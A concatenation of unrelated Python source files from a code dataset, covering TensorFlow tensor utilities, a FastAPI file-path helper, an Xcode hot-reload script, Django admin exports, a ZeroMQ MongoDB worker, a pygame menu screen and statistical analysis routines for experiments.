[batch, height_in*scale, width_in*scale, channels].
Raises:
ValueError: If both scale and height_scale or if both scale and width_scale
are None.
"""
if not scale and (height_scale is None or width_scale is None):
raise ValueError('Provide either `scale` or `height_scale` and'
' `width_scale`.')
with tf.name_scope(scope,'nearest_neighbor_upsampling'):
h_scale = scale if height_scale is None else height_scale
w_scale = scale if width_scale is None else width_scale
(batch_size, height, width,
channels) = combined_static_and_dynamic_shape(input_tensor)
output_tensor = tf.reshape(
input_tensor, [batch_size, height, 1, width, 1, channels]) * tf.ones(
[1, 1, h_scale, 1, w_scale, 1], dtype=input_tensor.dtype)
return tf.reshape(output_tensor,
[batch_size, height * h_scale, width * w_scale, channels])
def nearest_neighbor_downsampling(input_tensor, scale=None, height_scale=None,
width_scale=None):
if not scale and (height_scale is None or width_scale is None):
raise ValueError('Provide either `scale` or `height_scale` and'
' `width_scale`.')
with tf.name_scope('nearest_neighbor_downsampling'):
h_scale = scale if height_scale is None else height_scale
w_scale = scale if width_scale is None else width_scale
(batch_size, height, width,
channels) = combined_static_and_dynamic_shape(input_tensor)
output_tensor = tf.reshape(
input_tensor, [batch_size, height//h_scale, h_scale, width//w_scale, w_scale, channels])
return output_tensor[:,:,0,:,0,:]
def channel_upsample(input_tensor,scale=None,height_scale=None,width_scale=None):
if not scale and (height_scale is None or width_scale is None):
raise ValueError('Provide either `scale` or `height_scale` and'
' `width_scale`.')
with tf.name_scope('channel_upsampling'):
h_scale = scale if height_scale is None else height_scale
w_scale = scale if width_scale is None else width_scale
(batch_size, height, width,
channels) = combined_static_and_dynamic_shape(input_tensor)
out_channels = channels//(h_scale*w_scale)
output_tensor = tf.reshape(
input_tensor, [batch_size, height, width, h_scale,w_scale,out_channels])
output_tensor = tf.transpose(output_tensor,[0,1,3,2,4,5])
output_tensor = tf.reshape(output_tensor,[batch_size,height*h_scale,width*w_scale,out_channels])
return output_tensor
def select_image_by_mask(image,mask):
'''
:param image: [batch_size,H,W,C]
:param mask: [batch_size,N], tf.bool
:return:
[X,H,W,C], X = tf.reduce_sum(mask)
'''
with tf.name_scope("select_image_by_mask"):
batch_size,H,W,C = combined_static_and_dynamic_shape(image)
index = tf.reshape(tf.range(batch_size),[batch_size,1])*tf.ones_like(mask,dtype=tf.int32)
index = tf.boolean_mask(index,mask)
return tf.gather(image,index)
def sort_data(key,datas):
size = tf.shape(key)[0]
values,indices = tf.nn.top_k(key,k=size)
datas = [tf.gather(x,indices) for x in datas]
return [values,indices],datas
def get_pad_shapes_for_padded_batch(dataset):
shapes = dataset.output_shapes
res = {}
for k,v in shapes.items():
shape = v.as_list()
res[k] = shape
return res
def show_graph_info(graph=None):
flops = tf.profiler.profile(graph, options=tf.profiler.ProfileOptionBuilder.float_operation())
params = tf.profiler.profile(graph, options=tf.profiler.ProfileOptionBuilder.trainable_variables_parameter())
print('FLOPs: {}; Trainable params: {}'.format(flops.total_float_ops, params.total_parameters))
def concat_with_length(datas,lengths,axis=0):
real_datas = []
for i,d in enumerate(datas):
if axis==0:
d = d[:lengths[i]]
elif axis==1:
d = d[:,lengths[i]]
elif axis==-1:
d = d[...,lengths[i]]
else:
raise NotImplementedError("Error")
real_datas.append(d)
return tf.concat(real_datas,axis=axis)
def batch_concat_with_length(datas,lengths,axis=1):
if axis != 1:
raise NotImplementedError("Error")
masks = []
for i,t_len in enumerate(lengths):
maxlen = combined_static_and_dynamic_shape(datas[i])[1]
masks.append(tf.sequence_mask(t_len, maxlen=maxlen))
masks = tf.concat(masks,axis=1)
datas = tf.concat(datas,axis=axis)
max_len = combined_static_and_dynamic_shape(masks)[1]
def fn(data,mask):
data = tf.boolean_mask(data,mask)
cur_len = combined_static_and_dynamic_shape(data)[0]
paddings = [[0,max_len-cur_len]]
if len(data.get_shape())>1:
paddings += [[0,0]]*(len(data.get_shape())-1)
data = tf.pad(data,paddings=paddings)
length = tf.reduce_sum(tf.cast(mask,tf.int32))
return data,length
datas,lengths = tf.map_fn(lambda x:fn(x[0],x[1]),elems=(datas,masks),dtype=(datas[0].dtype,tf.int32))
return datas,lengths
if __name__ == "__main__":
wmlu.show_list(get_variables_in_ckpt_in_dir("../../mldata/faster_rcnn_resnet101/"))
| StarcoderdataPython |
6639556 | import os
import posixpath
from enum import Enum
from fastapi import Path, HTTPException
from utils import security
class UploadPath(str, Enum):
default = "default"
UPLOAD_PATH_DICT = {
UploadPath.default: "default/"
}
def get_upload(upload_key: UploadPath = Path(..., description="上传文件块位置")):
"""
获取文件上传目录
:param upload_key:
:return:
"""
root_path = posixpath.abspath(UPLOAD_PATH_DICT[upload_key])
def func(folder):
path = security.safe_join(root_path, folder)
os.makedirs(path, exist_ok=True)
return path
return func
class DownloadPath(str, Enum):
default = "default"
DOWNLOAD_PATH_DICT = {
DownloadPath.default: "default/"
}
def get_download(download_key: DownloadPath = Path(..., description="下载文件块位置")):
"""
获取下载文件路径
:param download_key:
:return:
"""
root_path = posixpath.abspath(DOWNLOAD_PATH_DICT[download_key])
def func(folder):
path = security.safe_join(root_path, folder)
if not posixpath.exists(path):
raise HTTPException(404, "The access file does not exist")
for filename in os.listdir(path):
return posixpath.join(path, filename), filename
return func
| StarcoderdataPython |
5064406 | <filename>hammer.py
import glob
import gzip
import os
import shutil
from subprocess import Popen, PIPE
destination_directory = None
"""
Tools
"""
class colors:
DEBUG = '\033[92m'
WARNING = '\033[93m'
ERROR = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def debug_log(logstring):
print(colors.DEBUG + "Hammer:DEBUG: " + colors.ENDC + logstring)
def warning_log(logstring):
print(colors.WARNING + "Hammer:WARNING: " + logstring + colors.ENDC)
def error_log(logstring):
print(colors.ERROR + "Hammer:ERROR: " + logstring + colors.ENDC)
def run_script(script, args):
p = Popen(['/usr/bin/osascript', '-'] + args, stdin=PIPE, stdout=PIPE, stderr = PIPE)
stdout, stderr = p.communicate(script)
return stdout.strip()
def newest_directory_in_path(path):
all_subdirs = [d for d in os.listdir(path) if os.path.isdir(os.path.join(path,d))]
latest_subdir = None
latest_time = 0
for d in all_subdirs:
current_dir = os.path.join(os.path.join(path,d))
current_dir_time = os.path.getmtime(current_dir)
if latest_subdir == None or current_dir_time > latest_time:
latest_subdir = current_dir
latest_time = current_dir_time
continue
return latest_subdir
"""
"""
def get_edited_file_name():
"""
Gets the current open file in xcode
"""
script = '''
tell application "Xcode"
set last_word_in_main_window to (word -1 of (get name of window 1))
set current_document to document 1 whose name ends with last_word_in_main_window
set current_document_path to path of current_document
return current_document_path
end tell
'''
val = run_script(script, [])
if len(val) > 0:
debug_log("Currently editing " + val + " in Xcode, we'll try to use that.")
else:
error_log("Failed to get current edited document in Xcode! Is Xcode running, and is a source file open?")
return val
def get_last_output_version(class_name):
files_in_path = os.listdir(destination_directory)
version_num = 0
for filename in files_in_path:
if filename.startswith(class_name):
tokens = filename.split("-")
if len(tokens) == 2 and tokens[0] == class_name:
version_num = int(tokens[1].split(".")[0])
version_num = version_num + 1
return version_num
def compile_edited_file(path_to_file):
"""
Gets the latest Xcode build log.
Returns path to the dylib
"""
if (len(path_to_file) > 0):
debug_log("Trying to compile " + path_to_file)
else:
error_log("Nothing to compile!")
derived_data_path = newest_directory_in_path(os.path.expanduser(os.path.join('~', 'Library', 'Developer', 'Xcode', 'DerivedData')))
logs_path = os.path.join(derived_data_path, 'Logs', 'Build', '*.xcactivitylog')
newest_log = min(glob.iglob(logs_path), key=os.path.getctime)
# the logfile is gzipped
compile_commands = []
dylib_output = None
with gzip.open(newest_log, 'r') as f:
line = f.read()
# just one line
path_to_file = path_to_file.replace(" ", "\ ")
index_of_path = line.rfind(path_to_file)
left_index = line[:index_of_path].rfind("\r")
right_index = line[index_of_path:].find("\r")
raw_command = line[left_index:index_of_path+right_index]
raw_command = raw_command.replace('-c ' + path_to_file, '-dynamiclib ' + path_to_file)
# change the output filename
path_component, file_component = os.path.split(path_to_file)
class_name = file_component.replace(".m", "")
file_component = file_component.replace('.m', '.o')
left_index = raw_command.find('-o ') + 3
right_index = raw_command.find(file_component) + len(file_component)
orig_output = raw_command[left_index:right_index]
version_num = get_last_output_version(class_name)
dylib_output = orig_output.replace(file_component, file_component.replace('.o', '-' + str(version_num) + '.dylib'))
raw_command = raw_command.replace(orig_output, dylib_output)
# skip missing symbols; they should be in the app too
raw_command = raw_command + ' -undefined dynamic_lookup'
raw_command = raw_command + ' -current_version ' + '1.0'
compile_commands.append(raw_command.strip())
compile_commands.append('codesign --force -s "-" ' + dylib_output)
for command in compile_commands:
debug_log("Executing compile commands")
debug_log(command)
os.system(command)
return dylib_output
def get_last_used_simulator_application_documents_path():
"""
Gets the path to the Documents directory of the last used simulator application
"""
core_path = os.path.expanduser(os.path.join('~', 'Library', 'Developer', 'CoreSimulator', 'Devices'))
simulator_app_data_path = os.path.join(newest_directory_in_path(core_path), 'data', 'Containers', 'Data', 'Application')
return os.path.join(newest_directory_in_path(simulator_app_data_path), 'Documents')
destination_directory = os.path.join(get_last_used_simulator_application_documents_path(), 'hammer')
# get the edited file
# compile it as a dynamic library
path_to_dylib = compile_edited_file(get_edited_file_name())
# move it to the simulator documents directory
try:
# create the destination, if needed
os.makedirs(destination_directory)
except IOError as e:
debug_log(e.strerror)
except:
pass
path_component, file_component = os.path.split(path_to_dylib)
debug_log("Moving new code into " + destination_directory)
new_path = os.path.join(destination_directory, file_component)
try:
# delete if exists
os.unlink(new_path)
except:
pass
try:
shutil.move(path_to_dylib, new_path)
except IOError as e:
error_log("Error while installing code into simulator.")
error_log(e.strerror)
except:
pass
debug_log("...done.")
# profit
| StarcoderdataPython |
3255872 | #!/usr/bin/python3
import sys
import os
import mod_path
import template
from headers import *
print_headers()
navbar = template.get("navbar")
print(template.get('contacts').format(**locals())) | StarcoderdataPython |
261150 | <filename>huxley/core/admin/registration.py
# Copyright (c) 2011-2021 Berkeley Model United Nations. All rights reserved.
# Use of this source code is governed by a BSD License (see LICENSE).
import csv
from django.conf import settings
from django.conf.urls import url
from django.contrib import admin
from django.urls import reverse
from django.http import HttpResponse, HttpResponseRedirect
from googleapiclient.discovery import build
from google.oauth2 import service_account
from huxley.core.models import Registration
class RegistrationAdmin(admin.ModelAdmin):
def get_rows(self):
rows = []
rows.append([
"Registration Time", "School Name", "Total Number of Delegates",
"Beginners", "Intermediates", "Advanced", "Spanish Speakers",
"Chinese Speakers", "Assignments Finalized", "Waivers Complete",
"Delegate Fees Paid", "Delegate Fees Owed",
"Paid Registration Fee?", "Country 1", "Country 2", "Country 3",
"Country 4", "Country 5", "Country 6", "Country 7", "Country 8",
"Country 9", "Country 10", "Committee Preferences",
"Registration Comments"
])
for registration in Registration.objects.all().order_by(
'school__name'):
country_preferences = [
str(cp)
for cp in registration.country_preferences.all().order_by(
'countrypreference')
]
country_preferences += [''] * (10 - len(country_preferences))
committee_preferences = [
', '.join(cp.name
for cp in registration.committee_preferences.all())
]
rows.append([
str(field) for field in [
registration.registered_at, registration.school.name,
registration.num_beginner_delegates +
registration.num_intermediate_delegates +
registration.num_advanced_delegates,
registration.num_beginner_delegates,
registration.num_intermediate_delegates,
registration.num_advanced_delegates,
registration.num_spanish_speaking_delegates,
registration.num_chinese_speaking_delegates, registration.
assignments_finalized, registration.waivers_completed,
registration.delegate_fees_paid, registration.
delegate_fees_owed, registration.registration_fee_paid
]
] + country_preferences + committee_preferences +
[str(registration.registration_comments)])
return rows
def info(self, request):
'''Returns a CSV file of all the registration information.'''
registrations = HttpResponse(content_type='text/csv')
registrations[
'Content-Disposition'] = 'attachment; filename="registration_info.csv"'
writer = csv.writer(registrations)
for row in self.get_rows():
writer.writerow(row)
return registrations
def sheets(self, request):
if settings.SHEET_ID:
SHEET_RANGE = 'Registration!A1:Y'
# Store credentials
creds = service_account.Credentials.from_service_account_file(
settings.SERVICE_ACCOUNT_FILE, scopes=settings.SCOPES)
data = self.get_rows()
body = {
'values': data,
}
service = build('sheets', 'v4', credentials=creds)
response = service.spreadsheets().values().clear(
spreadsheetId=settings.SHEET_ID,
range=SHEET_RANGE,
).execute()
response = service.spreadsheets().values().update(
spreadsheetId=settings.SHEET_ID,
range=SHEET_RANGE,
valueInputOption='USER_ENTERED',
body=body).execute()
return HttpResponseRedirect(
reverse('admin:core_registration_changelist'))
def get_urls(self):
return super(RegistrationAdmin, self).get_urls() + [
url(
r'info',
self.admin_site.admin_view(self.info),
name='core_registration_info',
),
url(
r'sheets',
self.admin_site.admin_view(self.sheets),
name='core_registration_sheets',
),
]
| StarcoderdataPython |
399285 | <reponame>rinceyuan/WeFe
# Copyright 2021 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from common.python.utils import log_utils
from kernel.utils import consts
LOGGER = log_utils.get_logger()
class BaseCrossValidator(object):
def __init__(self):
self.mode = None
self.role = None
def split(self, data_inst):
pass
def display_cv_result(self, cv_results):
LOGGER.debug("cv_result: {}".format(cv_results))
if self.role == consts.PROMOTER or (self.role == consts.PROVIDER and self.mode == consts.HORZ):
format_cv_result = {}
for eval_result in cv_results:
for eval_name, eval_r in eval_result.items():
if not isinstance(eval_r, list):
if eval_name not in format_cv_result:
format_cv_result[eval_name] = []
format_cv_result[eval_name].append(eval_r)
else:
for e_r in eval_r:
e_name = "{}_thres_{}".format(eval_name, e_r[0])
if e_name not in format_cv_result:
format_cv_result[e_name] = []
format_cv_result[e_name].append(e_r[1])
for eval_name, eva_result_list in format_cv_result.items():
mean_value = np.around(np.mean(eva_result_list), 4)
std_value = np.around(np.std(eva_result_list), 4)
LOGGER.info("{},evaluate name: {}, mean: {}, std: {}".format(self.role,
eval_name, mean_value, std_value))
| StarcoderdataPython |
11252771 | <filename>rabidmongoose/worker.py<gh_stars>0
'''
rabid.mongoose worker
follows the Paranoid Pirate Pattern from ZeroMQ
'''
from random import randint
import time
import zmq
from rabidmongoose.handlers import MongoHandler
from rabidmongoose.config import MONGOR, TIMEOUT, FLUENT, LOGTAG, \
HEARTBEAT_LIVENESS, HEARTBEAT_INTERVAL, \
INTERVAL_INIT, INTERVAL_MAX, \
PPP_READY, PPP_HEARTBEAT
from StringIO import StringIO
import logging
from uuid import uuid4
try:
from ujson import loads
except ImportError:
from json import loads
FORMAT = '%(asctime)s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
LOGGER = logging.getLogger(__name__)
try:
from fluent.handler import FluentHandler
LOGGER.addHandler(FluentHandler("%s.debug" %(LOGTAG),
host=FLUENT.split(":")[0],
port=int(FLUENT.split(":")[1])))
except ImportError:
pass #oh well, stdout is ok
class MongooseHandler:
def __init__(self, name=None):
self.name = name or str(uuid4())
self.mongo_handler = MongoHandler(MONGOR,
cursor_timeout = TIMEOUT,
fluentd = FLUENT,
logtag = LOGTAG)
self.cursors = set()
def close(self):
return
def handle_request(self, args, func_name, db_type, collection):
response_content = StringIO()
out = response_content.write
func = getattr(self.mongo_handler, func_name, None)
LOGGER.debug({"debug":"sending to %s" %(func_name)})
if callable(func):
func(args, out,
name = "", #TODO: remove this, around since sleepy.mongoose
db = db_type,
collection = collection)
else:
out('{"ok" : 0, "errmsg" : "%s not callable"}' %(func_name))
current_cursors = set(self.mongo_handler.available_cursors())
return response_content.getvalue(), current_cursors
def worker_socket(context, poller):
"""Helper function that returns a new configured socket
connected to the Paranoid Pirate queue"""
worker = context.socket(zmq.DEALER) # DEALER
identity = "%04X-%04X" % (randint(0, 0x10000), randint(0, 0x10000))
worker.setsockopt(zmq.IDENTITY, identity)
poller.register(worker, zmq.POLLIN)
worker.connect("tcp://localhost:8586")
worker.send(PPP_READY)
return worker
def handle_request(request_data):
LOGGER.debug({"debug":"got request %s" %(request_data)})
try:
job_data = loads(request_data)
(resp, cursors) = MH.handle_request(job_data['args'],
job_data['func_name'],
job_data['db'],
job_data['collection'])
except ValueError:
resp = '{"ok" : 0, "errmsg" : "cannot parse input JSON"}'
except KeyError:
resp = '{"ok" : 0, "errmsg" : "required keys not provided"}'
except:
resp = '{"ok" : 0, "errmsg" : "Unknown error in request worker"}'
return resp
def start():
global MH
MH = MongooseHandler()
context = zmq.Context(1)
poller = zmq.Poller()
liveness = HEARTBEAT_LIVENESS
interval = INTERVAL_INIT
heartbeat_at = time.time() + HEARTBEAT_INTERVAL
worker = worker_socket(context, poller)
while True:
socks = dict(poller.poll(HEARTBEAT_INTERVAL * 1000))
# Handle worker activity on backend
if socks.get(worker) == zmq.POLLIN:
# Get message
# - 3-part envelope + content -> request
# - 1-part HEARTBEAT -> heartbeat
frames = worker.recv_multipart()
if not frames:
break # Interrupted
if len(frames) == 3:
frames[2] = handle_request(frames[2])
worker.send_multipart(frames)
liveness = HEARTBEAT_LIVENESS
elif len(frames) == 1 and frames[0] == PPP_HEARTBEAT:
liveness = HEARTBEAT_LIVENESS
else:
LOGGER.error( {"errmsg": "Invalid message: %s" % frames })
interval = INTERVAL_INIT
else:
liveness -= 1
if liveness == 0:
LOGGER.error({"errmsg": "Heartbeat failure",
"reconnect": "Reconnect in %0.2fs" % interval})
time.sleep(interval)
if interval < INTERVAL_MAX:
interval *= 2
poller.unregister(worker)
worker.setsockopt(zmq.LINGER, 0)
worker.close()
worker = worker_socket(context, poller)
liveness = HEARTBEAT_LIVENESS
if time.time() > heartbeat_at:
heartbeat_at = time.time() + HEARTBEAT_INTERVAL
worker.send(PPP_HEARTBEAT)
if __name__ == "__main__":
start() | StarcoderdataPython |
6420759 | from thicket import files
def test_import():
assert files
| StarcoderdataPython |
3542027 | """
85 / 85 test cases passed.
Runtime: 156 ms
Memory Usage: 15.7 MB
"""
class Solution:
def minDeletionSize(self, strs: List[str]) -> int:
n = len(strs[0])
rec = set()
for i in range(1, len(strs)):
for j in range(n):
if j not in rec and strs[i][j] < strs[i - 1][j]:
rec.add(j)
if len(rec) == n:
return n
return len(rec)
| StarcoderdataPython |
4955893 | <reponame>ChrisQiqiang/allocation<filename>example/tensorflow/tensorflow2_mnist_bps_MirroredStrategy.py<gh_stars>1000+
import tensorflow as tf
import numpy as np
import json
import os
import sys
import argparse
import byteps.tensorflow as bps
from byteps.tensorflow.distribute import MirroredStrategy
parser = argparse.ArgumentParser(description='TensorFlow Synthetic Benchmark',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
args = parser.parse_args()
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
bps.init()
args.rank = bps.local_rank()
print("my rank ", args.rank)
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
if gpus:
tf.config.experimental.set_visible_devices(gpus[bps.local_rank()], 'GPU')
def mnist_dataset(batch_size):
(x_train, y_train), _ = tf.keras.datasets.mnist.load_data()
# The `x` arrays are in uint8 and have values in the range [0, 255].
# We need to convert them to float32 with values in the range [0, 1]
x_train = x_train / np.float32(255)
y_train = y_train.astype(np.int64)
train_dataset = tf.data.Dataset.from_tensor_slices(
(x_train, y_train)).shuffle(60000).repeat().batch(batch_size)
return train_dataset
def build_and_compile_cnn_model():
model = tf.keras.Sequential([
tf.keras.Input(shape=(28, 28)),
tf.keras.layers.Reshape(target_shape=(28, 28, 1)),
tf.keras.layers.Conv2D(32, 3, activation='relu'),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10)
])
model.compile(
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
optimizer=tf.keras.optimizers.SGD(learning_rate=0.001),
metrics=['accuracy'])
return model
per_worker_batch_size = 64
strategy = MirroredStrategy(devices=["/gpu:0"])
num_workers = 1
per_worker_batch_size = 64
# Here the batch size scales up by number of workers since
# `tf.data.Dataset.batch` expects the global batch size. Previously we used 64,
# and now this becomes 128.
global_batch_size = per_worker_batch_size * num_workers
multi_worker_dataset = mnist_dataset(global_batch_size)
with strategy.scope():
# Model building/compiling need to be within `strategy.scope()`.
multi_worker_model = build_and_compile_cnn_model()
# Keras' `model.fit()` trains the model with specified number of epochs and
# number of steps per epoch. Note that the numbers here are for demonstration
# purposes only and may not sufficiently produce a model with good quality.
multi_worker_model.fit(multi_worker_dataset, epochs=100, steps_per_epoch=70)
| StarcoderdataPython |
9694366 | <gh_stars>1-10
import os
import pygame
from pygame.locals import *
from definitions import MAPS_DIR
from game_state_machine.GameState import GameState
from utils import sound_path
class MapSelection(GameState):
def __init__(self):
super().__init__()
self.button_size = 50, 30
# Cores utilizadas no MapSelection
self.button_color = pygame.Color("yellow")
self.color_when_clicked = pygame.Color("white")
r = Rect((0, 0), self.button_size)
r.center = self.get_screen_rect().center
K = 50
# Mensagem e Posição do canto superior esquerdo de cada botao
self.buttons = [
{'name': 'menu', 'msg': 'Menu', 'pos': r.move(0, 0)},
{'name': 'quadra', 'msg': '1', 'pos': r.move(-180, 88)}, # quadra do C
{'name': 'hall', 'msg': '2', 'pos': r.move(40, -175)}, # hall do A
{'name': 'apart', 'msg': '3', 'pos': r.move(100, 170)}, # apart do C-
{'name': 'feijao', 'msg': '4', 'pos': r.move(-168, -115)}, # feijao
]
self.rects = [(b['pos'], b) for b in self.buttons]
self.select_sound = pygame.mixer.Sound(sound_path('select.ogg'))
self.enter_sound = pygame.mixer.Sound(sound_path('enter.ogg'))
self.hover = False
def startup(self):
pass
def cleanup(self):
pass
def update(self):
pass
def draw(self, surface):
# surface.fill(background_color)
bg = pygame.image.load(os.path.join(MAPS_DIR, 'h8_square_bare.png'))
surface.blit(bg, (0, 0))
for b in self.buttons:
self.draw_button(surface, b)
self.text = "Press/Click 1-4 to play or 'M' to go to Menu"
f2 = self.fonts['h3']
text_ = f2.render(self.text, True, pygame.Color("yellow"), 'black')
r = Rect((0, 0), (0, 0))
r.centerx = self.get_screen_rect().centerx
r.move_ip(-130, 490)
surface.blit(text_, r.topleft)
def draw_button(self, surface, button_info):
name = button_info['name']
pos = button_info['pos']
msg = button_info['msg']
size = self.button_size
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed(num_buttons=3)
rect = pos
inside = rect.collidepoint(mouse)
color = self.color_when_clicked if inside else self.button_color
pygame.draw.rect(surface, color, rect)
# colocando texto no botão
small_text = self.fonts['h2'] # fixme: h2 or m?
text_surf, text_rect = self.text_objects(msg, small_text)
text_rect.center = rect.center
surface.blit(text_surf, text_rect)
def on_key_up(self, e):
if K_1 <= e.key <= K_4 or K_KP1 <= e.key <= K_KP4:
if K_1 <= e.key <= K_4:
selected = str(e.key - K_1 + 1)
elif K_KP1 <= e.key <= K_KP4:
selected = str(e.key - K_KP1 + 1)
button = next(b for b in self.buttons if b['msg'] == selected)
self.enter_sound.play()
self.next_state = self.get_gameplay_state(button)
self.done = True
elif e.key == K_m:
self.next_state = 'Menu'
self.enter_sound.play()
self.done = True
def on_mouse_up(self, e):
if e.button == 1:
collided, next_state = self.get_collisions(e.pos)
if collided:
self.enter_sound.play()
self.next_state = next_state
self.done = True
def get_collisions(self, pos):
collided, msg = False, ''
for r, button in self.rects:
if r.collidepoint(pos):
msg = button['msg']
if msg.isnumeric():
next_state = self.get_gameplay_state(button)
else:
next_state = msg
return True, next_state
return False, None
def get_event(self, event):
if event.type == pygame.MOUSEMOTION:
previous = self.hover
self.hover = False
for rect, button in self.rects:
if rect.collidepoint(event.pos):
self.hover = True
if self.hover and not previous:
self.select_sound.play()
super(MapSelection, self).get_event(event)
@staticmethod
def get_gameplay_state(button):
return 'Playing' + button['name'].title().replace(' ', '')
@staticmethod
def text_objects(text, font):
"""
Cria o retângulo com escrita (o botão)
"""
text_surface = font.render(text, True, pygame.Color("black"))
return text_surface, text_surface.get_rect()
| StarcoderdataPython |
5138522 | <gh_stars>0
from .district import District
from .district_detail import DistrictDetail
| StarcoderdataPython |
8151982 | n=int(input())
ans=0
for i in range(1,n+1):
if n%i==0: ans+=i
print(ans*5-24) | StarcoderdataPython |
5039148 | from oeda.databases import db
from oeda.log import *
from oeda.analysis.two_sample_tests import Ttest, TtestPower, TtestSampleSizeEstimation
from oeda.analysis.one_sample_tests import DAgostinoPearson, AndersonDarling, KolmogorovSmirnov, ShapiroWilk
from oeda.analysis.n_sample_tests import Bartlett, FlignerKilleen, KruskalWallis, Levene, OneWayAnova
from oeda.analysis.factorial_tests import FactorialAnova
from oeda.rtxlib.executionstrategy.SelfOptimizerStrategy import start_self_optimizer_strategy
from oeda.rtxlib.executionstrategy.MlrStrategy import start_mlr_mbo_strategy
from collections import OrderedDict
from oeda.utilities.Structures import DefaultOrderedDict
from copy import deepcopy
import traceback
outer_key = "payload" # this is by default, see: data_point_type properties in experiment_db_config.json
def run_analysis(wf):
""" we run the correct analysis """
if wf.analysis["type"] == "two_sample_tests":
start_two_sample_tests(wf)
elif wf.analysis["type"] == "factorial_tests":
start_factorial_tests(wf)
elif wf.analysis["type"] == "one_sample_tests":
start_one_sample_tests(wf)
elif wf.analysis["type"] == "n_sample_tests":
start_n_sample_tests(wf)
info("> Finished analysis")
# there are always 2 samples for the t-test
def start_two_sample_tests(wf):
experiment_id = wf.id
alpha = wf.analysis["tTestAlpha"]
key = wf.analysis["data_type"]
mean_diff = 0.1 # as in crowdnav-elastic-ttest-sample-size/definition.py # TODO: get it from user ??
# this part will test this way of t-test: Default --> Best configuration
stage_ids, samples, knobs = get_tuples(experiment_id=experiment_id, step_no=wf.step_no, key=key)
test1 = Ttest(stage_ids=stage_ids, y_key=key, alpha=alpha)
result = test1.run(data=samples, knobs=knobs)
# prepare default & optimal knobs to save to analysis
stage_no = 1
knobs = {}
for tpl in wf.execution_strategy["knobs"]:
knobs[stage_no] = tpl
stage_no += 1
db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test1.name, result=result, knobs=knobs)
# if we want to integrate following tests, they should be saved as another step_no, just increment it before saving
# x1 = samples[0]
# x2 = samples[1]
# pooled_std = sqrt((np.var(x1) + np.var(x2)) / 2)
# effect_size = mean_diff / pooled_std
# effect_size = wf.analysis["tTestEffectSize"]
# test2 = TtestPower(stage_ids=stage_ids, y_key=key, effect_size=effect_size)
# result2 = test2.run(data=samples, knobs=knobs)
# db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test2.name, result=result2)
#
# test3 = TtestSampleSizeEstimation(stage_ids=stage_ids, y_key=key, effect_size=None, mean_diff=mean_diff)
# result3 = test3.run(data=samples, knobs=knobs)
# db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test3.name, result=result3)
return result
##########################
## One sample tests (Normality tests)
##########################
def start_one_sample_tests(wf):
id = wf.id
alpha = wf.analysis["alpha"]
key = wf.analysis["data_type"]
stage_ids, samples, knobs = get_tuples(experiment_id=id, step_no=wf.step_no, key=key)
test = AndersonDarling(id, key, alpha=alpha)
# as we have only one sample, we need to pass data=samples[0]
result = test.run(data=samples[0], knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
test = DAgostinoPearson(id, key, alpha=alpha)
result = test.run(data=samples[0], knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
test = KolmogorovSmirnov(id, key, alpha=alpha)
result = test.run(data=samples[0], knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
test = ShapiroWilk(id, key, alpha=alpha)
result = test.run(data=samples[0], knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
return
#########################
# Different distributions tests
# pass necessary stage_ids to db().save_analysis() method
#########################
def start_n_sample_tests(wf):
id = wf.id
alpha = wf.analysis["alpha"]
key = wf.analysis["data_type"]
stage_ids, samples, knobs = get_tuples(experiment_id=id, step_no=wf.step_no, key=key)
test = OneWayAnova(stage_ids=stage_ids, y_key=key, alpha=alpha)
result = test.run(data=samples, knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
test = KruskalWallis(stage_ids=stage_ids, y_key=key, alpha=alpha)
result = test.run(data=samples, knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
test = Levene(stage_ids=stage_ids, y_key=key, alpha=alpha)
result = test.run(data=samples, knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
test = Bartlett(stage_ids=stage_ids, y_key=key, alpha=alpha)
result = test.run(data=samples, knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
test = FlignerKilleen(stage_ids=stage_ids, y_key=key, alpha=alpha)
result = test.run(data=samples, knobs=knobs)
db().save_analysis(experiment_id=id, step_no=wf.step_no, analysis_name=test.name, result=result)
return
# there are >= 2 samples for factorial_tests
# ES saves the ordered dict in unordered format because of JSON serialization / deserialization
# see https://github.com/elastic/elasticsearch-py/issues/68 if you want to preserve order in ES
